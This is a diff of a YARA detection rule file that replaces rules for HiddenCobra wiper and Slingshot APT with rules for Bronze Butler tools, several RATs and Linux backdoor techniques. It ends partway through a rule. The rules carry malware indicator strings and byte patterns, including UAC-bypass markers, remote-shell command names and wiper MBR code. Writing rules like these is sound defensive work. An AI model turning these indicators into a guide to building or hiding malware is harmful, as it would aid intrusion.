+		logic_hash = "f5b8944910297988ecf5aecf23d20c384cf141a3a0972baadfacc4969dc46e7c"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "RUSSIA, FILE"
+		hash1 = "ae0bc3358fef0ca2a103e694aa556f55a3fed4e98ba57d16f5ae7ad4ad583698"
 
 	strings:
-		$ = "App_Web_juvjerf3.dll" fullword ascii
-		$ = "App_Web_vcplrg8q.dll" fullword ascii
-		$ = "ar_all2.txt" fullword ascii
-		$ = "ar_sa.txt" fullword ascii
-		$ = "Convert.FromBase64String(temp[1])" fullword ascii
-		$ = "D68gq#5p0(3Ndsk!" fullword ascii
-		$ = "dcomnetsrv" fullword ascii
-		$ = "ERRORF~1.ASP" fullword ascii
-		$ = "intelliAdminRpc" fullword ascii
-		$ = "J8fs4F4rnP7nFl#f" fullword ascii
-		$ = "Msnb.exe" fullword ascii
-		$ = "nautilus-service.dll"
-		$ = "Neuron_service" fullword ascii
-		$ = "owa_ar2.bat" fullword ascii
-		$ = "payload.x64.dll.system" fullword ascii
-		$ = "service.x64.dll.system" fullword ascii
+		$enc_string = {F3 0F 7E 05 ?? ?? ?? ?? 6? [5] 6A ?? 66 [6] 66 [7] F3 0F 7E 05 ?? ?? ?? ?? 8D
+      85 [4] 6A ?? 50 66 [7] E8}
+		$heap_ops = {8B [1-5] 03 ?? 5? 5? 6A 08 FF [1-6] FF ?? ?? ?? ?? ?? [0-6] 8B ?? [0-6] 8?}
+		$xor_cycle = { 8A 8C ?? ?? ?? ?? ?? 30 8C ?? ?? ?? ?? ?? 42 3B D0 72 }
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and filesize < 100KB and $xor_cycle and $heap_ops and $enc_string
 }
-rule SIGNATURE_BASE_Hiddencobra_R4_Wiper_1 : FILE
+rule SIGNATURE_BASE_Bronzebutler_Daserf_Delphi_1 : FILE
 {
 	meta:
-		description = "Detects HiddenCobra Wiper"
-		author = "NCCIC Partner"
-		id = "4978c190-7b66-5cea-96df-809f85620986"
-		date = "2017-12-12"
+		description = "Detects malware / hacktool sample from Bronze Butler incident"
+		author = "Florian Roth (Nextron Systems)"
+		id = "88372e62-3bba-58dc-825c-f35533e42825"
+		date = "2017-10-14"
 		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536.11.WHITE.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hiddencobra_wiper.yar#L8-L20"
+		reference = "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_bronze_butler.yar#L13-L36"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0e88b7f8491e87cce0deb5f246ca521bdb556b9c79c697559bdf8b0b332e714e"
+		logic_hash = "6034a6746a5bd762d869ad2e791d80aca8a1251afa9386d6b657f23092c6fc42"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "89a80ca92600af64eb9c32cab4e936c7d675cf815424d72438973e2d6788ef64"
+		hash2 = "b1bd03cd12638f44d9ace271f65645e7f9b707f86e9bcf790e0e5a96b755556b"
+		hash3 = "22e1965154bdb91dd281f0e86c8be96bf1f9a1e5fe93c60a1d30b79c0c0f0d43"
 
 	strings:
-		$mbr_code = { 33 C0 8E D0 BC 00 7C FB 50 07 50 1F FC BE 5D 7C 33 C9 41 81 F9 00 ?? 74 24 B4 43 B0 00 CD 13 FE C2 80 FA 84 7C F3 B2 80 BF 65 7C 81 05 00 04 83 55 02 00 83 55 04 00 83 55 06 00 EB D5 BE 4D 7C B4 43 B0 00 CD 13 33 C9 BE 5D 7C EB C5 }
-		$controlServiceFoundlnBoth = { 83 EC 1C 57 68 3F 00 0F 00 6A 00 6A 00 FF 15 ?? ?? ?? ?? 8B F8 85 FF 74 44 8B 44 24 24 53 56 6A 24 50 57 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B F0 85 F6 74 1C 8D 4C 24 0C 51 6A 01 56 FF 15 ?? ?? ?? ?? 68 E8 03 00 00 FF 15 ?? ?? ?? ?? 56 FF D3 57 FF D3 5E 5B 33 C0 5F 83 C4 1C C3 33 C0 5F 83 C4 1C C3 }
+		$s1 = "Services.exe" fullword ascii
+		$s2 = "Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; SV1)" fullword ascii
+		$s3 = "l32.dll" fullword ascii
+		$s4 = "tProcess:" fullword ascii
+		$s5 = " InjectPr" ascii
+		$s6 = "Write$Error creating variant or safe array\x1fInvalid argument to time encode" fullword wide
+		$s7 = "on\\run /v " fullword ascii
+		$s8 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\run" fullword ascii
+		$s9 = "ms1ng2d3d2.exe" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and uint16( uint32( 0x3c ) ) == 0x4550 and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and 3 of them )
 }
-rule SIGNATURE_BASE_Hiddencobra_R4_Wiper_2 : FILE
+
+rule SIGNATURE_BASE_Bronzebutler_Daserf_C_1 : FILE
 {
 	meta:
-		description = "Detects HiddenCobra Wiper"
-		author = "NCCIC Partner"
-		id = "75acc3cb-90dd-58e8-b094-ed3f28650b1b"
-		date = "2017-12-12"
+		description = "Detects malware / hacktool sample from Bronze Butler incident"
+		author = "Florian Roth (Nextron Systems)"
+		id = "62a5cc4a-7c58-5e4d-ac23-8d1f850a540a"
+		date = "2017-10-14"
 		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536.11.WHITE.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hiddencobra_wiper.yar#L22-L35"
+		reference = "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_bronze_butler.yar#L38-L78"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f537f67be28f854db0d56199d2a43f90cf6c80469a6f9853db0cd550440c7e1f"
+		logic_hash = "0b0c05db41d6b6ac48b31d8c22aead301470f465c2840ddc98ed9577d0aaa50b"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a4afd9df1b4cc014c3a89d7b4a560fa3e368b02286c42841762714b23e68cc05"
+		hash2 = "90ac1fb148ded4f46949a5fea4cd8c65d4ea9585046d66459328a5866f8198b2"
+		hash3 = "331ac0965b50958db49b7794cc819b2945d7b5e5e919c185d83e997e205f107b"
+		hash4 = "b1fdc6dc330e78a66757b77cc67a0e9931b777cd7af9f839911eecb74c04420a"
+		hash5 = "15abe7b1355cd35375de6dde57608f6d3481755fdc9e71d2bfc7c7288db4cd92"
+		hash6 = "85544d2bcaf8e6ca32bbc0a9e9583c9db1dce837043f555a7ff66363d5858439"
+		hash7 = "2dc24622c1e91642a21a64c0dd31cbe953e8f77bd3d6abcf2c4676c3b11bb162"
+		hash8 = "2bdb88fa24cffba240b60416835189c76a9920b6c3f6e09c3c4b171c2f57031c"
 
 	strings:
-		$PhysicalDriveSTR = "\\\\.\\PhysicalDrive" wide
-		$ExtendedWrite = { B4 43 B0 00 CD 13 }
+		$s1 = "(c) 2010 DYAMAR EnGineerinG, All rights reserved, http://www.dyamar.com." fullword ascii
+		$s2 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1)" fullword ascii
+		$a1 = "ndkkwqgcm" fullword ascii
+		$a2 = "RtlGetCo" fullword ascii
+		$a3 = "hutils" fullword ascii
+		$b1 = "%USERPROFILE%\\System" fullword ascii
+		$b2 = "msid.dat" fullword ascii
+		$b3 = "DRIVE_REMOTE" fullword wide
+		$b4 = "%s%s%s%s%s%s%s%s%s%s%s%s" fullword ascii
+		$b5 = "jcbhe.asp" fullword ascii
+		$b6 = "edset.asp" fullword ascii
+		$b7 = "bxcve.asp" fullword ascii
+		$b8 = "hcvery.php" fullword ascii
+		$b9 = "ynhkef.php" fullword ascii
+		$b10 = "dkgwey.php" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and uint16( uint32( 0x3c ) ) == 0x4550 and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "088382f4887e3b2c4bd5157f2d72b618" or all of ( $a* ) or 4 of them )
 }
-rule SIGNATURE_BASE_Slingshot_APT_Spork_Downloader : FILE
+rule SIGNATURE_BASE_Bronzebutler_Dget_1 : FILE
 {
 	meta:
-		description = "Detects malware from Slingshot APT"
+		description = "Detects malware / hacktool sample from Bronze Butler incident"
 		author = "Florian Roth (Nextron Systems)"
-		id = "21e02f78-40d8-5b56-b747-3f2a7a692259"
-		date = "2018-03-09"
+		id = "d60fcc9f-0f17-5871-9e8e-71d26e2f46bc"
+		date = "2017-10-14"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/apt-slingshot/84312/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_slingshot.yar#L11-L24"
+		reference = "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_bronze_butler.yar#L80-L93"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5dac11c595d838cb6b5f1e548307ea79d119c890c54e954453cf1a264e1d14ed"
+		logic_hash = "2d5537f581039fa4561950402a34cbd9abd54c167d659fbbe74f1cb83217e3fb"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "bd81521445639aaa5e3bcb5ece94f73feda3a91880a34a01f92639f8640251d6"
 
 	strings:
-		$s1 = "Usage: spork -c IP:PORT" fullword ascii wide
-		$s2 = "connect-back IP address and port number"
+		$s2 = "DGet Tool Made by XZ" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 10KB and 1 of them )
 }
-rule SIGNATURE_BASE_Slingshot_APT_Minisling : FILE
+rule SIGNATURE_BASE_Bronzebutler_Uacbypass_1 : FILE
 {
 	meta:
-		description = "Detects malware from Slingshot APT"
+		description = "Detects malware / hacktool sample from Bronze Butler incident"
 		author = "Florian Roth (Nextron Systems)"
-		id = "99f9d5a1-b29f-52f7-9aec-02df4a51a756"
-		date = "2018-03-09"
+		id = "01853352-58fc-56a3-8c20-08405c71e251"
+		date = "2017-10-14"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/apt-slingshot/84312/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_slingshot.yar#L26-L38"
+		reference = "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_bronze_butler.yar#L95-L113"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7d370271fea6c607c051eb49681600b4f59878c2fd2d43d71194bddda78d7b09"
+		logic_hash = "64b70b9f5963be9009025c14a6e98be9642599af5226f77946b6255116fc22d8"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "fe06b99a0287e2b2d9f7faffbda3a4b328ecc05eab56a3e730cfc99de803b192"
 
 	strings:
-		$s1 = "{6D29520B-F138-442e-B29F-A4E7140F33DE}" fullword ascii wide
+		$x1 = "\\Release\\BypassUacDll.pdb" ascii
+		$x2 = "%programfiles%internet exploreriexplore.exe" fullword wide
+		$x3 = "Elevation:Administrator!new:{3ad055" fullword wide
+		$x4 = "BypassUac.pdb" fullword ascii
+		$x5 = "[bypassUAC] started X64" fullword wide
+		$x6 = "[bypassUAC] started X86" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and 1 of them )
 }
-rule SIGNATURE_BASE_Slingshot_APT_Ring0_Loader : FILE
+rule SIGNATURE_BASE_Bronzebutler_Xxmm_1 : FILE
 {
 	meta:
-		description = "Detects malware from Slingshot APT"
+		description = "Detects malware / hacktool sample from Bronze Butler incident"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b5301a45-a4ec-5e56-a990-bc6300ee6365"
-		date = "2018-03-09"
+		id = "0e413e3a-fb61-58bc-9ecb-4ef76e83a7f3"
+		date = "2017-10-14"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/apt-slingshot/84312/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_slingshot.yar#L40-L58"
+		reference = "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_bronze_butler.yar#L115-L140"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c231158e44de01585e9fb4bd9768b388016972e2026e049070cdc6cd35362609"
+		logic_hash = "eb9c12cbe2fe132a9588b744d10caee12716f622c31da8a1cee4c0f88d693e8e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7197de18bc5a4c854334ff979f3e4dafa16f43d7bf91edfe46f03e6cc88f7b73"
 
 	strings:
-		$s1 = " -> Missing element in DataDir -- cannot install" ascii
-		$s2 = " -> Primary loader not present in the DataDir" ascii
-		$s3 = "\\\\.\\amxpci" fullword ascii
-		$s4 = " -> [Goad] ERROR in CreateFile:" fullword ascii
-		$s5 = "\\\\.\\Sandra" fullword ascii
-		$s6 = " -> [Sandra] RingZeroCode" fullword ascii
-		$s7 = " -> [Sandra] Value from IOCTL_RDMSR:" fullword ascii
+		$x1 = "\\Release\\ReflectivLoader.pdb" ascii
+		$x3 = "\\Projects\\xxmm2\\Release\\" ascii
+		$x5 = "http://127.0.0.1/phptunnel.php" fullword ascii
+		$s1 = "xxmm2.exe" fullword ascii
+		$s2 = "\\AvUpdate.exe" wide
+		$s3 = "stdapi_fs_file_download" fullword ascii
+		$s4 = "stdapi_syncshell_open" fullword ascii
+		$s5 = "stdapi_execute_sleep" fullword ascii
+		$s6 = "stdapi_syncshell_kill" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 700KB and ( 1 of ( $x* ) or 4 of them )
 }
-
-rule SIGNATURE_BASE_Slingshot_APT_Malware_1 : FILE
+rule SIGNATURE_BASE_Bronzebutler_Rarstar_1 : FILE
 {
 	meta:
-		description = "Detects malware from Slingshot APT"
+		description = "Detects malware / hacktool sample from Bronze Butler incident"
 		author = "Florian Roth (Nextron Systems)"
-		id = "72f4a52b-c70b-511f-acf5-6d680a95c7d6"
-		date = "2018-03-09"
+		id = "770270b3-6743-5efb-84d8-b63f1df800d9"
+		date = "2017-10-14"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/apt-slingshot/84312/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_slingshot.yar#L60-L79"
+		reference = "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_bronze_butler.yar#L142-L158"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "43cf94058fe3833a4623ecb784eea50e199536d4903fb9457843b7b5e9a244e3"
+		logic_hash = "0e418e595020d91c575051c3b1639b09efad150c625b62eec3d1331f9792641b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4b250304e28648574b441831bf579b844e8e1fda941fb7f86a7ea7c4291bbca6"
+		hash1 = "0fc1b4fdf0dc5373f98de8817da9380479606f775f5aa0b9b0e1a78d4b49e5f4"
 
 	strings:
-		$s1 = "SlingDll.dll" fullword ascii
-		$s2 = "BogusDll." ascii
-		$s3 = "smsvcrt -h 0x%p" fullword wide
+		$s1 = "Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+6.0;+SV1)" fullword wide
+		$s2 = "http://www.google.co.jp" fullword wide
+		$s3 = "16D73E22-873D-D58E-4F42-E6055BC9825E" fullword ascii
+		$s4 = "\\*.rar" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 700KB and ( pe.imphash ( ) == "7ead4bb0d752003ce7c062adb7ffc51a" or pe.exports ( "WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW0000" ) or 1 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them )
 }
-rule SIGNATURE_BASE_Slingshot_APT_Malware_2 : FILE
+rule SIGNATURE_BASE_Daserf_Nov1_Bronzebutler : FILE
 {
 	meta:
-		description = "Detects malware from Slingshot APT"
+		description = "Detects Daserf malware used by Bronze Butler"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b85d3d81-0148-5ea0-9eff-d9bb63e3e75b"
-		date = "2018-03-09"
+		id = "58c4d3dc-c516-567b-8746-4e185c3cd328"
+		date = "2017-11-08"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/apt-slingshot/84312/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_slingshot.yar#L81-L100"
+		reference = "https://goo.gl/ffeCfd"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_bronze_butler.yar#L170-L196"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d56dadf747c64cb518ddc9aaee38fd50c67fe7344d7569d9ef3169099e7f36c5"
+		logic_hash = "75edc17c51f4ea82ff7722df2f5825721ff64445fb8c78b450f1333bd32b5829"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2a51ef6d115daa648ddd57d1e4480f5a18daf40986bfde32aab19349aa010e67"
+		hash1 = "5ede6f93f26ccd6de2f93c9bd0f834279df5f5cfe3457915fae24a3aec46961b"
 
 	strings:
-		$x1 = "\\\\?\\c:\\RECYCLER\\S-1-5-21-2225084468-623340172-1005306204-500\\INFO5" fullword wide
-		$x_slingshot = {09 46 BE 57 42 DD 70 35 5E }
-		$s1 = "Opening service %s for stop access failed.#" fullword wide
-		$s2 = "LanMan setting <%s> is ignored because system has a higher value already." fullword wide
-		$s3 = "\\DosDevices\\amxpci" wide
-		$s4 = "lNTLMqSpPD" fullword ascii
+		$x1 = "mstmp1845234.exe" fullword ascii
+		$x2 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; SV1)" fullword ascii
+		$x3 = "Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; SV1)" fullword ascii
+		$s1 = "Content-Type: */*" fullword ascii
+		$s2 = "ProxyEnable" ascii fullword
+		$s3 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer" ascii fullword
+		$s4 = "iexplore.exe" ascii fullword
+		$s5 = "\\SOFTWARE\\Microsoft\\Windows\\Cu" ascii
+		$s6 = "rrentVersion\\Internet Settings" fullword ascii
+		$s7 = "ws\\CurrentVersion\\Inter" fullword ascii
+		$s8 = "Documents an" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 900KB and ( 1 of ( $x* ) or 4 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 700KB and ( 1 of ( $x* ) or 5 of them )
 }
-
-rule SIGNATURE_BASE_Slingshot_APT_Malware_3 : FILE
+rule SIGNATURE_BASE_RAT_AAR
 {
 	meta:
-		description = "Detects malware from Slingshot APT"
-		author = "Florian Roth (Nextron Systems)"
-		id = "4ef1f9a6-3d80-545e-8ac3-c6d46c71fca1"
-		date = "2018-03-09"
+		description = "Detects AAR RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "42c1af80-cff3-505f-a3cb-35b7e34575e1"
+		date = "2014-01-04"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/apt-slingshot/84312/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_slingshot.yar#L102-L122"
+		reference = "http://malwareconfig.com/stats/AAR"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L1-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "420c54ce90a13258e0dd54524fe7df4dd97d3e8f1eeaa8ca14350670a87e87c6"
+		logic_hash = "a206b3f5cf6cc870135bc267b5baab8333422dc917efce6c66ee907690592d09"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fa513c65cded25a7992e2b0ab03c5dd5c6d0fc2282cd64a1e11a387a3341ce18"
+		tags = ""
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$a1 = "chmhlpr.dll" fullword ascii
-		$s2 = "%hc%hc%hc%hc" fullword ascii
-		$s3 = "%hc%hc%hc=" fullword ascii
-		$s4 = "%hc%hc==" fullword ascii
+		$a = "Hashtable"
+		$b = "get_IsDisposed"
+		$c = "TripleDES"
+		$d = "testmemory.FRMMain.resources"
+		$e = "$this.Icon" wide
+		$f = "{11111-22222-20001-00001}" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( pe.imphash ( ) == "2f3b3df466e24e0792e0e90d668856bc" or pe.exports ( "dll_u" ) or ( $a1 and 2 of ( $s* ) ) )
+		all of them
 }
-rule SIGNATURE_BASE_Slingshot_APT_Malware_4 : FILE
+rule SIGNATURE_BASE_RAT_Adzok
 {
 	meta:
-		description = "Detects malware from Slingshot APT"
-		author = "Florian Roth (Nextron Systems)"
-		id = "0f957330-1834-550f-ba5d-fb2bf0dfba7f"
-		date = "2018-03-09"
+		description = "Detects Adzok RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "93807f85-ae4e-5fd2-9010-ed2cf6f57f38"
+		date = "2015-01-05"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/apt-slingshot/84312/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_slingshot.yar#L124-L144"
+		reference = "http://malwareconfig.com/stats/Adzok"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L24-L48"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a9f4b7b4079ebd5ffbee4c82032d28b0015968cb369fae2b0f19b054bf5a1c3c"
+		logic_hash = "ee3291a4396ba6cb3c5e22229de4f5e45714b29bfeac1c56bde6d038a9d25458"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "38c4f5320b03cbaf5c14997ea321507730a8c16906e5906cbf458139c91d5945"
+		tags = ""
+		Versions = "Free 1.0.0.3,"
+		maltype = "Remote Access Trojan"
+		filetype = "jar"
 
 	strings:
-		$x1 = "Ss -a 4104 -s 257092 -o 8 -l 406016 -r 4096 -z 315440" fullword wide
-		$s1 = "Slingshot" fullword ascii
-		$s2 = "\\\\?\\e:\\$Recycle.Bin\\" wide
-		$s3 = "LineRecs.reloc" fullword ascii
-		$s4 = "EXITGNG" fullword ascii
+		$a1 = "config.xmlPK"
+		$a2 = "key.classPK"
+		$a3 = "svd$1.classPK"
+		$a4 = "svd$2.classPK"
+		$a5 = "Mensaje.classPK"
+		$a6 = "inic$ShutdownHook.class"
+		$a7 = "Uninstall.jarPK"
+		$a8 = "resources/icono.pngPK"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( $x1 or 2 of them )
+		7 of ( $a* )
 }
-rule SIGNATURE_BASE_SUSP_LNX_Byteencoder_Jan25 : FILE
+rule SIGNATURE_BASE_RAT_Ap0Calypse
 {
 	meta:
-		description = "Detects Linux binaries that encode bytes by splitting them into upper and lower nibbles and mapping them to custom lookup tables, seen being used by SEASPY and Bluez backdoors"
-		author = "MalGamy (Nextron System)"
-		id = "4866348a-2129-5f6a-9498-8ab1acfa74b4"
-		date = "2025-01-23"
-		modified = "2025-03-20"
-		reference = "https://www.securityweek.com/newly-discovered-turla-malware-targets-linux-systems/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/seaspy_backdoor_jan25.yar#L1-L22"
+		description = "Detects Ap0calypse RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "a2993654-efa0-519b-b6f6-4d722d93adde"
+		date = "2014-01-04"
+		modified = "2023-12-05"
+		reference = "http://malwareconfig.com/stats/Ap0calypse"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L50-L71"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "3e0312ce8d0c1e5c192dbb93cac4770a1205c56dc9d02a0510c7e10a15251de5"
-		hash = "301d58a6a1819466e77209dbf8ca635cbee3b45516e5ee228fea50ae4a27b7d5"
-		hash = "957c0c135b50d1c209840ec7ead60912a5ccefd2873bf5722cb85354cea4eb37"
-		hash = "5e3c128749f7ae4616a4620e0b53c0e5381724a790bba8314acb502ce7334df2"
-		hash = "b0b83e1c69aa8df6da4383230bef1ef46e09f3bf26cec877eac53a9d48dc53ca"
-		hash = "d21b40645e33638bd36b63582c2c6ad5e8230c731236a54e8e5f4139bad31fdf"
-		logic_hash = "c0fe841681d3aaa8687c95f475f68b2d8b2f26afe42e9d15c601602fcc5e50cb"
+		logic_hash = "1ce90a5b1b3f643d4e530d6e00741f5d5918d3199cfbc4126cf8421a9e42023e"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$op1 = {8B 45 FC 48 63 D0 48 8B 45 A8 48 01 C2 8B 45 BC C1 F8 04 83 E0 0F 48 98 0F B6 44 05 E0 88 02}
-		$op2 = {8B 45 FC 48 98 48 8D 50 01 48 8B 45 A8 48 01 C2 8B 45 BC 83 E0 0F 48 98 0F B6 44 05 C0 88 02}
+		$a = "Ap0calypse"
+		$b = "Sifre"
+		$c = "MsgGoster"
+		$d = "Baslik"
+		$e = "Dosyalars"
+		$f = "Injecsiyon"
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize < 4MB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_SUSP_LNX_Stackstring_Technique_Jan25 : FILE
+rule SIGNATURE_BASE_RAT_Arcom
 {
 	meta:
-		description = "Detects suspicious Linux binaries using stack-based string manipulation techniques, which are often used to generate PTY (pseudo-terminal) device names for stealth or persistence, seen being used by SEASPY and Bluez backdoors"
-		author = "MalGamy (Nextron System)"
-		id = "6c81d8c1-0cfa-54d9-89d3-2b025cc22f13"
-		date = "2025-01-23"
-		modified = "2025-03-20"
-		reference = "https://www.securityweek.com/newly-discovered-turla-malware-targets-linux-systems/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/seaspy_backdoor_jan25.yar#L24-L45"
+		description = "Detects Arcom RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "a0598340-c4a5-53f0-a810-63e37ec669a5"
+		date = "2014-01-04"
+		modified = "2023-12-05"
+		reference = "http://malwareconfig.com/stats/Arcom"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L72-L93"
